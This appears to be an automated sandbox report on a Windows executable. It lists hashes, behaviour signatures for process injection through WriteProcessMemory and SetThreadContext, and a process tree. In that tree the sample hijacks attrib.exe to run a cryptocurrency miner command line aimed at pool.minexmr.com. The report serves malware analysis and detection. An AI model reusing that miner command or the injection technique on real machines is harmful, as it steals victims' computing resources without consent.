36080ef6743ec65d9bbdc36aa601d393b3fdaa5b4c916963a1b0b0f7275a20ba

Analysis

max time kernel
150s
max time network
121s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
15/03/2024, 01:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ca2487021bc6fa77a6f8386f5097d727.exe
Size

2.7MB
MD5

ca2487021bc6fa77a6f8386f5097d727
SHA1

01088cbbffc246a3ab420beee892dc0b3953455c
SHA256

36080ef6743ec65d9bbdc36aa601d393b3fdaa5b4c916963a1b0b0f7275a20ba
SHA512

f77d3fc8acf0c9629a14edacee05dc1d0072089916c54c930e0892e0a19a074d49f5153a406aec0f9ff0479fa7ac4e6594d14744a38f55f99a4816b269876dd9
SSDEEP

12288:qW7KWB+/2Cg16y7D8mDMw0J6kKCAgEkQqRXFDm4oE4tR73B23P:qdWPCgIyUNMDqEdUpDoEi5BM

Score

5^/10

Malware Config

Signatures

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1712 set thread context of 2352	1712	ca2487021bc6fa77a6f8386f5097d727.exe	28
PID 1712 set thread context of 2584	1712	ca2487021bc6fa77a6f8386f5097d727.exe	29

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe
1712	ca2487021bc6fa77a6f8386f5097d727.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1712 wrote to memory of 2352	1712	ca2487021bc6fa77a6f8386f5097d727.exe	28
PID 1712 wrote to memory of 2352	1712	ca2487021bc6fa77a6f8386f5097d727.exe	28
PID 1712 wrote to memory of 2352	1712	ca2487021bc6fa77a6f8386f5097d727.exe	28
PID 1712 wrote to memory of 2352	1712	ca2487021bc6fa77a6f8386f5097d727.exe	28
PID 1712 wrote to memory of 2352	1712	ca2487021bc6fa77a6f8386f5097d727.exe	28
PID 1712 wrote to memory of 2352	1712	ca2487021bc6fa77a6f8386f5097d727.exe	28
PID 1712 wrote to memory of 2352	1712	ca2487021bc6fa77a6f8386f5097d727.exe	28
PID 1712 wrote to memory of 2352	1712	ca2487021bc6fa77a6f8386f5097d727.exe	28
PID 1712 wrote to memory of 2352	1712	ca2487021bc6fa77a6f8386f5097d727.exe	28
PID 1712 wrote to memory of 2584	1712	ca2487021bc6fa77a6f8386f5097d727.exe	29
PID 1712 wrote to memory of 2584	1712	ca2487021bc6fa77a6f8386f5097d727.exe	29
PID 1712 wrote to memory of 2584	1712	ca2487021bc6fa77a6f8386f5097d727.exe	29
PID 1712 wrote to memory of 2584	1712	ca2487021bc6fa77a6f8386f5097d727.exe	29
PID 1712 wrote to memory of 2584	1712	ca2487021bc6fa77a6f8386f5097d727.exe	29
PID 1712 wrote to memory of 2584	1712	ca2487021bc6fa77a6f8386f5097d727.exe	29
PID 1712 wrote to memory of 2584	1712	ca2487021bc6fa77a6f8386f5097d727.exe	29
PID 1712 wrote to memory of 2584	1712	ca2487021bc6fa77a6f8386f5097d727.exe	29
PID 1712 wrote to memory of 2584	1712	ca2487021bc6fa77a6f8386f5097d727.exe	29

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2352	attrib.exe
2584	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ca2487021bc6fa77a6f8386f5097d727.exe
"C:\Users\Admin\AppData\Local\Temp\ca2487021bc6fa77a6f8386f5097d727.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1712
- C:\Windows\SysWOW64\attrib.exe
  attrib.exe -o pool.minexmr.com:5555 -u [email protected] -p x --donate-level=1
  2⤵
  - Views/modifies file attributes
  PID:2352
- C:\Windows\SysWOW64\attrib.exe
  attrib.exe -o pool.minexmr.com:5555 -u [email protected] -p x --donate-level=1
  2⤵
  - Views/modifies file attributes
  PID:2584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2352-0-0x0000000000BA0000-0x00000000011CB000-memory.dmp

Filesize
6.2MB

Download
memory/2352-1-0x0000000000BA0000-0x00000000011CB000-memory.dmp

Filesize
6.2MB

Download
memory/2352-2-0x0000000000BA0000-0x00000000011CB000-memory.dmp

Filesize
6.2MB

Download
memory/2352-3-0x0000000000BA0000-0x00000000011CB000-memory.dmp

Filesize
6.2MB

Download
memory/2352-4-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2352-6-0x0000000000BA0000-0x00000000011CB000-memory.dmp

Filesize
6.2MB

Download
memory/2584-10-0x0000000000E80000-0x00000000014AB000-memory.dmp

Filesize
6.2MB

Download
memory/2584-11-0x0000000000E80000-0x00000000014AB000-memory.dmp

Filesize
6.2MB

Download
memory/2584-13-0x0000000000E80000-0x00000000014AB000-memory.dmp

Filesize
6.2MB

Download
memory/2584-15-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2584-17-0x0000000000E80000-0x00000000014AB000-memory.dmp

Filesize
6.2MB

Download